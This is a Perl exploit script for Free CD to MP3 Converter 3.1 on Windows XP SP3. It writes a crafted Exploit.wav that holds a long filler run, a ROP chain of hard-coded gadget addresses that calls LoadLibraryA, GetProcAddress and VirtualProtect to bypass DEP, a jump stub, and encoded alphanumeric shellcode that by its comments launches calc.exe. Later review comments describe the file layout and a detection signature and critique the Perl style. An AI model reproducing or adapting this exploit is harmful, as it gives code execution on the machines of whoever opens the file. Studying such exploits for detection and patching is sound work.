#!/usr/bin/perl
#
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#Dep bypass method:
#LoadLibraryA("kernel32.dll") + GetProcAddress(%EAX,"VirtualProtect") + VirtualProtect(%ESP,0x400,0x40,0x10007064) == Universal DEP BYPASS. :)
#
#
# NOTE(review): the only observable effect of this script is one file,
# Exploit.wav, written to the current working directory. Its layout, as built
# below, is: 4112 filler bytes, the $rop byte string, a 7-byte stub, 21 more
# filler bytes, then the alphanumeric $shellcode string. No network activity
# and no other file is touched; the payload is inert data inside the .wav
# until something else opens it. That fixed layout (a long run of 0x41 bytes
# followed by the hard-coded addresses) is what a file-based detection would
# key on.

print q{
Created By C4SS!0 G0M3S
E-mail louredo_@hotmail.com
Blog net-fuzzer.blogspot.com
};
sleep(2);

#Address for LoadLibraryA 0x672CA660
##################################ROP FOR LOAD "kernel32.dll"#############################################
my $rop = pack('V',0x00418764); # POP ESI # RETN
$rop .= pack('V',0x672CA660); # Address to LoadLibraryA
$rop .= pack('V',0x00412d09); # POP EBP # RETN
$rop .= pack('V',0x004AD39B); # ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN // return address for the LoadLibraryA call
$rop .= pack('V',0x00472be9); # PUSHAD # POP EBX # RETN
$rop .= "kernel32.dll\x00";
$rop .= "A" x 27;
##################################ROP END HERE###########################################################

#Address for GetProcAddress 0x672CA668
##################################ROP FOR Function GetProcAddress########################################
$rop .= pack('V',0x0048004d);# POP EBP # RETN
$rop .= "\x00\x00\x00\x00";
$rop .= pack('V',0x00409a7f);# POP EDI # RETN
$rop .= pack('V',0x672CA668);# Address for GetProcAddress
$rop .= pack('V',0x0042ad45);# PUSH ESP # POP ESI # RETN
$rop .= pack('V',0x004a1b0e);# POP ESI # RETN
$rop .= pack('V',0x004AD39B);# ADD ESP,24 # POP EBP # POP EDI # POP ESI # POP EBX # RETN // return address for the GetProcAddress call
$rop .= pack('V',0x00421953);# ADD EBP,EAX # RETN
$rop .= pack('V',0x004c0634);# PUSHAD # RETN
$rop .= "VirtualProtect\x00";
$rop .= "A" x 25;
##################################ROP END HERE###########################################################

#################################ROP FOR VirtualProtect#################################################
$rop .= pack('V',0x0042c786);# XCHG EAX,ESI # RETN // VirtualProtect address
$rop .= pack('V',0x004d2c70);# POP EBP # RETN
$rop .= pack('V',0x0047E58B);# JMP ESP // return address for the VirtualProtect call
$rop .= pack('V',0x0046abf7);# POP EBX # RETN
$rop .= pack('V',0x00000400);# dwSize value
$rop .= pack('V',0x00402bb4);# POP EDX # RETN
$rop .= pack('V',0x00000040);# flNewProtect value
$rop .= pack('V',0x10002b9c);# POP ECX # RETN
$rop .= pack('V',0x10007064);# lpflOldProtect value
$rop .= pack('V',0x00472be9);# PUSHAD # POP EBX # RETN
#################################ROP END HERE###########################################################

# The payload is kept as printable alphanumeric text (see the author's
# comments below); the script itself never decodes or executes it.
my $shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK".
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO".
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9". #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ". #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN".
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8".
"WDN0SUK8WOMV4DNNTWPYWN27KA";

# Assemble the file body: filler, ROP bytes, 7-byte stub, 21 filler bytes, payload.
my $buf = "A" x 4112;
$buf .= $rop;
$buf .= "\x8B\xC4\x83\xC0\x20\xFF\xD0".("A" x 21).$shellcode;

print "\t\t[+]Creating File Exploit.wav...\n";
sleep(1);
# NOTE(review): bareword filehandle and two-arg open. The mode string is a
# fixed literal here, so there is no mode-injection risk, but the idiom is
# `open my $fh, '>', 'Exploit.wav' or die ...`. Note also that the file is
# opened in text mode, not binmode, and that close is unchecked, so a failed
# buffered write would not be reported.
open(f,">Exploit.wav") || die "[-]Error: $!\n";
print f $buf;
close f;
print "\t\t[+]File Exploit.wav Created Successfully.\n";
sleep(1);